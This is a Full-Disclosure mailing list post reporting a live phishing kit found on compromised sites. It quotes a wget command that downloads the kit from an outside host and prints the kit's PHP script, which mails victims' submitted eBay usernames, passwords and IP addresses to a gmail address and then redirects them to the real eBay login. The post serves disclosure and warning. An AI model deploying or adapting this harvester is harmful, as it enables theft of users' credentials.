Fresh Phish anyone?

["Kevin Finisterre (lists)" <kf_lists () digitalmunition com>]

>

Someone is bored and out making the rounds exploiting random asp pages  
and web-services.

wget http://www.adehkz.net/eb.zip


<?php
session_start();

$userid = $_POST['userid'];
$password = $_POST['password'];
$ip = getenv("REMOTE_ADDR");

$subj = "eB - $userid";
$msg = "Username: $userid\nPassword: $password\n....\nIP: $ip";
mail("asdfwr () gmail com", $subj, $msg);
header("Location: 
https://signin.ebay.com/ws/eBayISAPI.dll?SignIn&errmsg=8&pUserId=&co_partnerId=2&siteid=0&pageType=1883&pa1=&i1=-1&UsingSSL=1&bshowgif=0&favoritenav=&ru=http%3A%2F%2Fmy.ebay.com%2Fws%2FeBayISAPI.dll%3FMyeBay&pp=&migrateVisitor=1
 
");

?>

I passed this on to the SANS handlers a few days ago but the site is  
still up and running.

Enjoy

-KF

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/